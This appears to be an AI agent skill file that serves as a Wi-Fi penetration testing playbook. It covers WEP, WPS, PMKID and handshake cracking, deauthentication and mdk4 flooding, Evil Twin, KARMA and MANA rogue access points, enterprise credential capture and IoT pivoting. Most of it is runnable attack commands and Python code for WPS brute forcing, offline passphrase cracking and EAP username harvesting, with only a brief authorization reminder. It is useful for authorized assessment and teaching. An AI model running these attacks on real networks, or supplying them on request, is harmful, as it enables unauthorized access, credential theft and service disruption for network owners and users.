| name | wifi-pentest |
| description | Wi-Fi security testing and penetration testing. Use this skill whenever the user mentions Wi-Fi attacks, wireless security testing, WEP/WPA/WPS cracking, Evil Twin attacks, deauthentication, handshake capture, PMKID attacks, WPA Enterprise testing, KARMA/MANA attacks, or any wireless network assessment. This skill covers reconnaissance, attack execution, and credential capture for Wi-Fi networks. |
Wi-Fi Pentesting Skill
A comprehensive skill for Wi-Fi security assessment and penetration testing. This skill guides you through wireless network reconnaissance, attack execution, and credential capture.
When to Use This Skill
Use this skill when the user asks about:
- Wi-Fi network security testing or assessment
- WEP, WPA, WPA2, WPA3 cracking or attacks
- WPS (Wi-Fi Protected Setup) attacks
- Evil Twin, KARMA, or MANA attacks
- Deauthentication or DoS attacks on Wi-Fi
- Handshake capture or PMKID extraction
- WPA Enterprise (802.1X) testing
- Wi-Fi Direct security testing
- IoT device Wi-Fi exploitation
- Wireless network reconnaissance
Prerequisites
Before starting any Wi-Fi pentest:
- Hardware: Wi-Fi adapter that supports monitor mode and packet injection
- OS: Kali Linux or similar penetration testing distribution
- Permissions: Root/sudo access required for most operations
- Legal: Ensure you have explicit authorization to test the target network
Quick Reference Commands
Interface Management
ip link show
iwconfig
airmon-ng check kill
airmon-ng start wlan0
ip link set wlan0 down && iwconfig wlan0 mode monitor && ip link set wlan0 up
airmon-ng stop wlan0mon
ip link set wlan0mon down && iwconfig wlan0mon mode managed && ip link set wlan0mon up
systemctl start NetworkManager
Network Scanning
airodump-ng wlan0mon
airodump-ng wlan0mon --band a
airodump-ng wlan0mon --wps
iw dev wlan0 scan | grep "^BSS\|SSID\|Authentication\|WPS\|WPA"
iwlist wlan0 scan
Attack Categories
1. Reconnaissance
Start with passive scanning to identify targets:
airodump-ng --bssid <BSSID> --channel <CH> --write capture wlan0mon
airodump-ng wlan0mon --wps
2. WEP Attacks
WEP is trivially broken. Use this workflow:
airodump-ng --bssid <BSSID> --channel <CH> --write wep_capture wlan0mon
aireplay-ng --arpreplay -b <BSSID> -h <CLIENT_MAC> wlan0mon
aircrack-ng wep_capture-01.cap
Why WEP fails: RC4 is keyed with the static WEP key prefixed by a 24-bit IV that is sent in the clear, so on a busy network IVs repeat within hours. A repeated IV means a repeated keystream, and XORing two such ciphertexts cancels it and exposes plaintext. The PTW attack goes further, statistically correlating IVs with key bytes, so the key falls out of tens of thousands of captured packets; the ARP replay above exists only to generate that traffic quickly.
3. WPS Attacks
WPS uses an 8-digit PIN, but the AP confirms the two halves separately (NACK at M4 for a wrong first half, at M6 for a wrong second half) and the last digit is a checksum, so an online brute force needs at most 10^4 + 10^3 = 11,000 attempts.
WPS Bruteforce
reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -f -N -vv
bully wlan0mon -b <BSSID> -c <CHANNEL> -S -F -B -v 3
Pixie Dust Attack (Offline)
Exploits weak nonce generation in some APs:
reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -K 1 -N -vv
bully wlan0mon -b <BSSID> -c <CHANNEL> -d -v 3
./oneshot -i wlan0 -K -b <BSSID>
Null PIN Attack
Some poorly configured APs accept empty PIN:
reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -f -N -g 1 -vv -p ''
After obtaining WPS PIN: The PIN reveals the WPA/WPA2 PSK, granting persistent network access.
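The checksum digit and the split search are what turn 10^8 PINs into 11,000 attempts. The following is an added example (not reaver or bully code) that implements the WPS checksum used by those tools and drives a brute force against a constructed stand-in for the AP's M4/M6 NACK behaviour; the PinOracle class and the default PIN 12345670 are assumptions for illustration.

```python
"""WPS PIN checksum and the split brute force behind the ~11,000 bound.
Added example (not reaver/bully code); PinOracle is a constructed stand-in
for an AP that NACKs at M4 (first half wrong) or M6 (second half wrong)."""


def wps_checksum(first7: int) -> int:
    """Checksum digit for the first 7 digits of a WPS PIN (the algorithm reaver uses)."""
    accum = 0
    while first7:
        accum += 3 * (first7 % 10)
        first7 //= 10
        accum += first7 % 10
        first7 //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin: str) -> bool:
    """True if the 8-digit PIN's last digit matches the checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class PinOracle:
    """Constructed model of a WPS registrar: one protocol run per attempt, and the
    NACK position tells the attacker which half was wrong."""

    def __init__(self, secret_pin: str):
        assert wps_pin_valid(secret_pin), "secret PIN must carry a valid checksum"
        self._secret = secret_pin
        self.attempts = 0

    def check_first_half(self, half: str) -> bool:
        self.attempts += 1
        return half == self._secret[:4]

    def check_second_half(self, half: str) -> bool:
        self.attempts += 1
        return half == self._secret[4:]


def bruteforce_wps(oracle: PinOracle) -> str:
    """Online WPS brute force: up to 10^4 tries for the first half, then up to 10^3
    for the second half because the eighth digit is fixed by the checksum."""
    first = next(f"{i:04d}" for i in range(10_000) if oracle.check_first_half(f"{i:04d}"))
    for j in range(1_000):
        tail = f"{j:03d}"
        candidate = first + tail + str(wps_checksum(int(first + tail)))
        if oracle.check_second_half(candidate[4:]):
            return candidate
    raise RuntimeError("no PIN found; AP may not enforce the checksum")


if __name__ == "__main__":
    ap = PinOracle("12345670")  # a common vendor default PIN, used here as the secret
    print(bruteforce_wps(ap), "recovered after", ap.attempts, "attempts")
```

Some APs ignore the checksum digit; reaver's `--no-checksum` style options cover that case by trying all 10 final digits, which raises the worst case to 20,000.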
4. WPA/WPA2 PSK Attacks
PMKID Attack (Clientless)
Capture PMKID from AP without needing connected clients:
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool && make && sudo make install
hcxdumptool -i wlan0mon -o /tmp/attack.pcapng --enable_status=1   # option names change between hcxdumptool versions; check hcxdumptool -h
./eaphammer --pmkid --interface wlan0 --channel <CH> --bssid <BSSID>
hcxpcapngtool -o /tmp/hash.hc22000 /tmp/attack.pcapng   # current hcxtools converter, hashcat 22000 format (PMKID and EAPOL in one file)
hashcat -m 22000 /tmp/hash.hc22000 /usr/share/wordlists/rockyou.txt
hcxpcaptool -z hashes.txt /tmp/attack.pcapng   # legacy converter, hashcat 16800 PMKID format
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt   # John needs its own format: export with hcxpcaptool's John output option (see hcxpcaptool -h), the 16800 line is not accepted as-is
Valid PMKID format (hashcat 16800): four '*'-separated fields, PMKID*AP_MAC*CLIENT_MAC*ESSID_hex, e.g. 4017733ca8db33a1479196c2415173be*b808d7b83cfa*a4a6a9a5aae7*566f6461666f6e65436f6e6e6563743034383131343838 (the last field is the ESSID "VodafoneConnect04811488" in hex). A PMKID only helps against WPA/WPA2-PSK: under WPA3-SAE the PMK comes from the Dragonfly exchange rather than from PBKDF2 over the passphrase, so it cannot be cracked offline this way.
Handshake Capture
Traditional method requiring a connected client:
airodump-ng wlan0mon -c <CHANNEL> --bssid <BSSID> -w /tmp/psk --output-format pcap
aireplay-ng -0 5 -a <BSSID> -c <CLIENT_MAC> wlan0mon   # short burst so the client reconnects; -0 0 deauths forever and the client never completes the handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> /tmp/psk*.cap
Verify Handshake in Capture
aircrack-ng psk-01.cap
tshark -r psk-01.cap -n -Y eapol
cowpatty -r psk-01.cap -s "ESSID" -f -
pyrit -r psk-01.cap analyze   # pyrit is unmaintained (Python 2); prefer aircrack-ng or hcxpcapngtool for verification
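Both the PMKID line above and the handshake verification here come down to the same offline check: derive the PMK from a candidate passphrase with PBKDF2 and compare either the PMKID or the EAPOL message 2 MIC. The following is an added example (not code from hcxtools, hashcat or aircrack-ng) that does both; the ESSID "TestNet", the passphrase "correcthorse", the nonces and the minimal EAPOL-Key frame are constructed, and the MAC addresses are reused from the page's sample line.

```python
"""Offline WPA2-PSK verification as hashcat/aircrack do it: PMKID (hashcat 16800
line) and 4-way handshake MIC. Added example, not hcxtools/hashcat/aircrack-ng
code; sample values are constructed."""
import hashlib
import hmac
from typing import Optional


def pmk_from_passphrase(passphrase: str, essid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    # PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA); the AP puts it in message 1,
    # which is why one frame from the AP suffices and no client needs to be present
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def parse_16800(line: str):
    """hashcat -m 16800 line: PMKID*AP_MAC*STA_MAC*ESSID_hex (four '*'-separated parts)."""
    p, ap, sta, essid = line.strip().split("*")
    return bytes.fromhex(p), bytes.fromhex(ap), bytes.fromhex(sta), bytes.fromhex(essid).decode()


def make_16800(passphrase: str, essid: str, mac_ap: bytes, mac_sta: bytes) -> str:
    """Build a 16800 line for a known passphrase (used here to fabricate test input)."""
    p = pmkid(pmk_from_passphrase(passphrase, essid), mac_ap, mac_sta)
    return "*".join([p.hex(), mac_ap.hex(), mac_sta.hex(), essid.encode().hex()])


def crack_pmkid(line: str, wordlist) -> Optional[str]:
    target, ap, sta, essid = parse_16800(line)
    for cand in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(cand, essid), ap, sta), target):
            return cand
    return None


def ptk_from_pmk(pmk, mac_ap, mac_sta, anonce, snonce) -> bytes:
    # PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN))
    data = min(mac_ap, mac_sta) + max(mac_ap, mac_sta) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]  # KCK = PTK[0:16] is all the MIC check needs


MIC_OFFSET = 81  # EAPOL hdr 4 + desc type 1 + key info 2 + key len 2 + replay 8 + nonce 32 + IV 16 + RSC 8 + ID 8


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    # WPA2/CCMP (key descriptor version 2): HMAC-SHA1-128 over the frame with the MIC field zeroed
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(essid, mac_ap, mac_sta, anonce, snonce, eapol_msg2, wordlist) -> Optional[str]:
    """What aircrack-ng does once it has message 1 (ANonce) and message 2 (SNonce + MIC)."""
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for cand in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(cand, essid), mac_ap, mac_sta, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured_mic):
            return cand
    return None


def build_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Constructed minimal EAPOL-Key message 2 (key info 0x010a: pairwise, MIC, version 2)."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + (1).to_bytes(8, "big") + snonce
            + bytes(16) + bytes(8) + bytes(8) + mic + b"\x00\x00")
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


# Constructed scenario: AP/client pair with a known passphrase, to exercise both paths.
ESSID, AP, STA = "TestNet", bytes.fromhex("b808d7b83cfa"), bytes.fromhex("a4a6a9a5aae7")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
PMKID_LINE = make_16800("correcthorse", ESSID, AP, STA)
_kck = ptk_from_pmk(pmk_from_passphrase("correcthorse", ESSID), AP, STA, ANONCE, SNONCE)[:16]
MSG2 = build_msg2(SNONCE, eapol_mic(_kck, build_msg2(SNONCE)))

if __name__ == "__main__":
    words = ["password", "correcthorse", "letmein"]
    print("PMKID ->", crack_pmkid(PMKID_LINE, words))
    print("handshake ->", crack_handshake(ESSID, AP, STA, ANONCE, SNONCE, MSG2, words))
```

For a real capture, pull the ANonce from message 1 and the SNonce plus the whole EAPOL frame of message 2 with `tshark -r psk-01.cap -Y eapol -T fields -e wlan.sa -e wlan.da -e eapol.keydes.nonce -e eapol` and feed them in; a TKIP (key descriptor version 1) network uses HMAC-MD5 for the MIC instead, and WPA3-SAE handshakes cannot be cracked this way at all.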
5. WPA Enterprise (802.1X) Attacks
Enterprise networks use RADIUS authentication with various EAP methods.
Username Capture
EAP-Response/Identity is exchanged before any TLS tunnel exists, so the outer identity is visible in cleartext. Clients configured with an anonymous outer identity (anonymous@realm) leak only the realm; the rest leak a valid username:
airodump-ng wlan0mon -c <CHANNEL> --bssid <BSSID>
tcpdump -i wlan0mon -w eap_capture.pcap 'ether proto 0x888e'   # 0x888e is the EAPOL ethertype; tcpdump has no "eapol" keyword (tshark's display filter does)
EAP Bruteforce (Password Spray)
./air-hammer.py -i wlan0 -e <ESSID> -P <PASSWORD> -u usernames.txt
./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 \
--essid <ESSID> \
--password <PASSWORD> \
--user-list users.txt
SIM-based EAP (IMSI Leakage)
EAP-SIM/EAP-AKA can leak IMSI in cleartext:
airmon-ng start wlan0
tcpdump -i wlan0mon -s 0 -w eapsim_identity.pcap
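What the username capture above is grepping for is the EAP-Response/Identity payload inside an EAPOL frame. The following is an added example (not part of any tool on this page) that parses that frame layout and separates anonymous outer identities from real ones; the two frames and the realm corp.example are constructed.

```python
"""Pull usernames out of EAP-Response/Identity frames (802.1X). Added example,
not part of the page's tooling; the frames built below are constructed."""
from typing import List, Optional

EAPOL_EAP_PACKET = 0   # EAPOL type field: 0 = EAP-Packet, 1 = Start, 2 = Logoff, 3 = Key
EAP_RESPONSE = 2
EAP_TYPE_IDENTITY = 1


def eap_identity(eapol: bytes) -> Optional[str]:
    """Return the identity carried by an EAPOL/EAP-Response/Identity frame, else None.
    Layout: EAPOL ver(1) type(1) len(2) | EAP code(1) id(1) len(2) type(1) type-data."""
    if len(eapol) < 9 or eapol[1] != EAPOL_EAP_PACKET:
        return None
    eap = eapol[4:4 + int.from_bytes(eapol[2:4], "big")]
    code, length = eap[0], int.from_bytes(eap[2:4], "big")
    if code != EAP_RESPONSE or length < 5 or eap[4] != EAP_TYPE_IDENTITY:
        return None
    return eap[5:length].decode("utf-8", "replace")


def classify(identity: str) -> dict:
    """An anonymous@realm outer identity hides the user and leaks only the realm;
    a bare or user@realm identity leaks a valid username."""
    user, _, realm = identity.partition("@")
    return {"user": user, "realm": realm or None, "anonymous": user.lower() in ("anonymous", "")}


def build_identity_response(eap_id: int, identity: str) -> bytes:
    """Constructed EAPOL frame, for testing or comparison with tshark's eap.identity field."""
    data = identity.encode()
    eap = (bytes([EAP_RESPONSE, eap_id]) + (5 + len(data)).to_bytes(2, "big")
           + bytes([EAP_TYPE_IDENTITY]) + data)
    return bytes([1, EAPOL_EAP_PACKET]) + len(eap).to_bytes(2, "big") + eap


def harvest(frames) -> List[str]:
    """Unique, non-anonymous identities from a list of raw EAPOL frames."""
    seen: List[str] = []
    for frame in frames:
        ident = eap_identity(frame)
        if ident and not classify(ident)["anonymous"] and ident not in seen:
            seen.append(ident)
    return seen


if __name__ == "__main__":
    sample = [build_identity_response(1, "alice@corp.example"),
              build_identity_response(2, "anonymous@corp.example"),
              b"\x01\x03\x00\x05\x02\x01\x00\x05\x01"]  # an EAPOL-Key frame, not EAP
    print(harvest(sample))
```

Even an anonymous outer identity is useful: the realm tells you which RADIUS domain the Evil Twin in section 6 should impersonate, and the inner identity still transits the tunnel, which is what the rogue RADIUS server of an enterprise Evil Twin terminates.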
6. Evil Twin Attacks
An Evil Twin impersonates an ESSID the client already trusts; clients auto-join saved networks, and a deauth from the real AP plus a stronger signal from the rogue one is usually enough to make them roam to it.
Open Evil Twin
airbase-ng -a <FAKE_MAC> --essid "<TARGET_ESSID>" -c <CHANNEL> wlan0mon
./eaphammer -i wlan0 --essid <ESSID> --captive-portal
WPA/WPA2 Evil Twin
Requires knowing the PSK, otherwise clients fail the 4-way handshake and never associate:
./eaphammer -i wlan0 -e <ESSID> -c <CHANNEL> --creds --auth wpa-psk --wpa-passphrase "<PASSWORD>"
Enterprise Evil Twin
./eaphammer --cert-wizard
./eaphammer -i wlan0 --channel <CH> --auth wpa-eap --essid <ESSID> --creds
./eaphammer --negotiate gtc-downgrade
./eaphammer --negotiate weakest
Authentication method priority (EAPHammer default): GTC, MSCHAPV2, TTLS-MSCHAPV2, TTLS, TTLS-CHAP, TTLS-PAP, TTLS-MSCHAP, MD5. GTC comes first because it hands over the plaintext password; MSCHAPv2 yields a challenge/response that still has to be cracked (asleap, or hashcat -m 5500 after conversion). Which method a client will accept is decided by its supplicant configuration, not by the rogue AP, and a client that validates the server certificate will not reach this stage at all.
7. KARMA, MANA, Known Beacon Attacks
KARMA Attack
Responds to every directed probe request with the SSID the client asked for. Modern clients rarely send directed probes for non-hidden networks, so KARMA alone gets few hits today; the MANA and known-beacon variants below exist for that reason:
./eaphammer -i wlan0 --cloaking full --captive-portal
MANA Attack
Learns each client's PNL from its directed probes and then answers that client's broadcast probes with those SSIDs:
./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal]
Loud MANA
Answers every client's broadcast probes with every SSID learned from any client, trading precision for hit rate:
./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal]
Known Beacon Attack
Cycles through wordlist of SSIDs:
./eaphammer -i wlan0 --mana --loud --known-beacons --known-ssids-file wordlist.txt
Known Beacon Burst
Rapid-fire beacon transmission:
./forge-beacons -i wlan0 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5
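The difference between KARMA, MANA and loud MANA is a small policy about which probe requests get which probe responses. The following is an added example, not EAPHammer or hostapd-mana code, that models that policy as a tiny responder and runs a constructed probe sequence through it; the MAC addresses, SSIDs and the `RogueAP` class are assumptions for illustration.

```python
"""Probe-response policy of KARMA vs MANA vs loud MANA, modelled as a tiny responder.
Added example to make the three behaviours concrete; not EAPHammer/hostapd-mana code.
Client MACs and SSIDs are constructed."""
from typing import Dict, List, Optional, Set


class RogueAP:
    """mode 'karma': answer every directed probe with the requested SSID, ignore wildcard probes.
    mode 'mana': additionally answer a client's wildcard probe with the SSIDs that client
    revealed earlier (its PNL). mode 'loud': answer wildcard probes with every SSID learned
    from any client."""

    def __init__(self, mode: str):
        assert mode in ("karma", "mana", "loud")
        self.mode = mode
        self.pnl: Dict[str, Set[str]] = {}   # client MAC -> SSIDs it probed for

    def handle_probe(self, client: str, ssid: Optional[str]) -> List[str]:
        """ssid=None is a broadcast (wildcard) probe request. Returns the SSIDs we
        respond with, i.e. the networks the client may now try to join."""
        if ssid:  # directed probe: the client names a network from its PNL
            self.pnl.setdefault(client, set()).add(ssid)
            return [ssid]  # every mode impersonates whatever was asked for
        if self.mode == "karma":
            return []      # KARMA has nothing to offer a wildcard probe
        if self.mode == "mana":
            return sorted(self.pnl.get(client, ()))
        return sorted(set().union(*self.pnl.values()))  # loud: everyone's PNL, to everyone


def run_scenario(mode: str) -> List[List[str]]:
    """Constructed traffic: phone 01 probes for two saved networks, tablet 02 for one,
    then all three clients (03 has revealed nothing) send wildcard probes."""
    ap = RogueAP(mode)
    return [
        ap.handle_probe("aa:aa:aa:aa:aa:01", "CorpWiFi"),
        ap.handle_probe("aa:aa:aa:aa:aa:01", "HomeNet"),
        ap.handle_probe("aa:aa:aa:aa:aa:02", "Airport_Free"),
        ap.handle_probe("aa:aa:aa:aa:aa:01", None),
        ap.handle_probe("aa:aa:aa:aa:aa:02", None),
        ap.handle_probe("bb:bb:bb:bb:bb:03", None),
    ]


if __name__ == "__main__":
    for mode in ("karma", "mana", "loud"):
        print(mode, run_scenario(mode)[3:])
```

Client 03 never sends a directed probe, so only loud MANA reaches it, and only with SSIDs other clients leaked; a client that sends nothing but wildcard probes for networks nobody else has revealed is exactly the case the known-beacon wordlist attack is for.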
8. DoS Attacks
Deauthentication
aireplay-ng -0 <COUNT> -a <BSSID> -c <CLIENT_MAC> wlan0mon
mdk4 wlan0mon d -c <CHANNEL> -b <blacklist.txt> -E <ESSID> -B <BSSID>   # -b takes a file of client MACs (one per line), not a single address
Beacon Flooding (mdk4)
Creates fake APs, may crash scanners:
mdk4 wlan0mon b -a -w nta -m
Authentication DoS (mdk4)
Overloads AP with auth frames:
mdk4 wlan0mon a -a <BSSID> -m
mdk4 wlan0mon a -i <BSSID> -m
TKIP Michael Countermeasures (mdk4)
Two TKIP MIC failures within 60 seconds make the AP invoke Michael countermeasures and suspend all traffic for 60 seconds; mdk4 forges the failures (TKIP/WPA1 networks only):
mdk4 wlan0mon m -t <BSSID> [-j]
EAPOL Flooding (mdk4)
Creates fake sessions or disconnects clients:
mdk4 wlan0mon e -t <BSSID> [-l]
9. Wi-Fi Direct Attacks
EvilDirect Hijacking
Impersonate Wi-Fi Direct group owner:
airbase-ng -a <FAKE_MAC> --essid <DIRECT_ESSID> -c <CHANNEL> wlan0mon
10. IoT Pivoting (Shelly Gen4 Example)
Some IoT devices keep their unauthenticated commissioning AP (here the 192.168.33.1 setup network) active after provisioning. The device's HTTP API is then reachable from that side, and its scripting engine can be used to reach hosts on the LAN it is joined to, for example by firing an HTTP request into the internal network whenever the relay is switched on:
http://192.168.33.1/relay/0?turn=on
Shelly.addEventHandler(function (event) {
if (event.component === "switch:0" && event.info.state) {
Shelly.call("HTTP.GET", { url: "http://10.0.98.221/light/0?turn=on" });
}
});
Tools Installation
EAPHammer
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
./kali-setup
Airgeddon
mv $(which dhcpd) $(which dhcpd).old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe
docker run --rm -ti --name airgeddon --net=host --privileged \
-p 3000:3000 -v /tmp:/io \
-e DISPLAY="$DISPLAY" \
v1s1t0r1sh3r3/airgeddon
Wifiphisher
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python3 setup.py install
Wifite2
Automates WPS/WEP/WPA-PSK attacks:
git clone https://github.com/derv82/wifite2.git
cd wifite2
sudo python3 setup.py install
sudo wifite -i wlan0mon   # the installed command is wifite, not wifite2
Best Practices
- Always verify authorization before testing any network
- Document findings including BSSID, channel, encryption type, vulnerabilities
- Use wordlists like rockyou.txt for password cracking
- Combine attacks - deauth + handshake capture, MANA + captive portal
- Test multiple methods - PMKID may work when handshake capture fails
- Consider PMF/802.11w - it is mandatory in WPA3 and optional in WPA2; when enabled, deauth/disassoc frames are authenticated, so spoofed ones are ignored
- Check for client isolation on open/OWE networks before assuming L2 access
Common Issues
- Monitor mode fails: Some adapters don't support it. Try different hardware.
- Deauth not working: Target may have PMF/802.11w enabled (always on WPA3, optional on WPA2); check the RSN capabilities in the beacon
- Handshake not capturing: May need to wait for client to reconnect, or use PMKID instead.
- WPS timeout: AP may block MAC addresses. Use MAC rotation or try Pixie Dust.
- Evil Twin not connecting: Client may prefer stronger signal or validate certificates.